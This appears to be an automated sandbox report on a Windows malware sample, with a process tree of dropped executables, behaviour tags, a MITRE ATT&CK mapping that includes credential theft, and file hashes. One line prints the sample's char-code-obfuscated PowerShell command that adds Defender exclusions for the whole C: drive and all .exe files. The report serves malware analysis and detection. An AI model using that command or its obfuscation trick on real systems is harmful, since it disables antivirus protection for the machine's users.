C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:716
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:676 -
C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 676 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:2104
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1724
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5d8628e68ae2d8db113cc32e76c7b3025
SHA120851a4de7112d621323fd609a29f3480fd5e198
SHA256c6556b4b6b9f845968adb6dc60236cfc936e729080df8c72b792c70ab5e8165e
SHA512627a71bf9662991a06e3c272a9d9428b736bd5e344e875db5b67c30da6208beae068f3977f6c10a2e844486fe78d920b54e4255d6220be3507f8e02e623f9ccf
-
Filesize
364KB
MD5019b0ee933aa09404fb1c389dca4f4d1
SHA1fef381e3cf9fd23d2856737b51996ed6a5bb3e1d
SHA256ed3214368e1d12d1da9b096b3a2664dfa000f4986ca506de2f0df3e4ee9dda4f
SHA51275b3de8b533feb576e1e59c56311960f5ab8dfdc1a837d962c37d54283d9e21907fd395793c5aa1b4582f5a303f43191d6403b35b0f8e1d1e1f4c2b63e3bd246
-
Filesize
938KB
MD514cfe14475dca24283c8e2833829c951
SHA1af19bcfb1765694a1365f9b78aa80e571af545cb
SHA256d5225912cb01c0b4ea017c970957973e6a2337f891e1bc7484f61f8b3dc5940f
SHA512dd0be68b65b00a81cc886a24537fb730cd20f8eb084834814cd8ccbf9517ea53b092daa1669c0e6c16e87bb5fd5737cd2b61d34bcb6e577112c1c66033f0d21f
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
41KB
MD58eb68502689cac1c88b366c9a420c12a
SHA161e426e53d204780138877a9ccc8aa7cbe633a96
SHA2562e4d69c22a96881066046b29df0f3dfc2a3ba11b2922af6bb24c67df3b014a99
SHA512c766efba5da5cac0d3dc80d52d0a43d2278b10a041d89eacee3e0e7797ee830b4f6637fe3176df0a8de23a98f23b6325ef3ac7ecf382d9a2f9d3a7ca7d799288
-
Filesize
18KB
MD5c4e6239cad71853ac5330ab665187d9f
SHA1845e3aa5bf52c5eef683d98fb68f00fd6bb0f5c0
SHA2564ba27a9d19e6717ba3049c8a99a1127a431c5639121cff564f35711bea613745
SHA5120ea90b8505d292812b1a1618f3c842771a46f74a8d4376179e4294046e811d82f3a07b9555c352773c84e92eeeebcd5321090df598621ccdb9ba174b3b0fa0da
-
Filesize
137KB
MD5da8846245fb9ec49a3223f7731236c7f
SHA173189b12b69dc840ab373861748ba7fa0f4859c9
SHA256a54c3a619f8fc2f69b09098a45f880c352de39c568235de9f988fce9bf8c6f48
SHA512df420d91375d0cbd26ca16bfb8e7cf9a0076790719a5130fa52af6a319c50d307bb3b355521fdd0dd5ce19a684b53add02ebad6becad179b88447bedd67cf203
-
Filesize
717B
MD5836122af56af1c5e5f505dbaa1c28b7b
SHA1f9e59874da798fc75da257044be0a622e72f0688
SHA256e874cdf0bdfa002e320b6371f7648dde07162226642a1dc849fe1f6957492c6c
SHA5127acc586a495268d3b5f619b671b6dff916238c9a0155091c5a4248e1ab35765e699fc0b2ca9890e08f40f273adc8005bc382b2563d08ef5a990abd5775d44fc2
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50cbe49de6d5fabf80a8c45150e65046f
SHA167257082f7442afd59d656340676e057443dde3d
SHA256ab12a3fdeb7cd035d7d48015a4ddab3fac84d6a36e817acf274c23328fa5734d
SHA5124d7cc27d63d6c839d02e5f7c40517972e72f7c8f40c1e558425eb355576c719a73e2ff1c956efe88d71106220f5a5cd61a4050c8e43d6dac7df6037d4047523d
-
Filesize
1.8MB
MD534a1010b4f6cf9c985d71453702602d7
SHA1266541f9f120e4d4b79ebb5687bbe8a045281b6b
SHA256ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09
SHA512fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d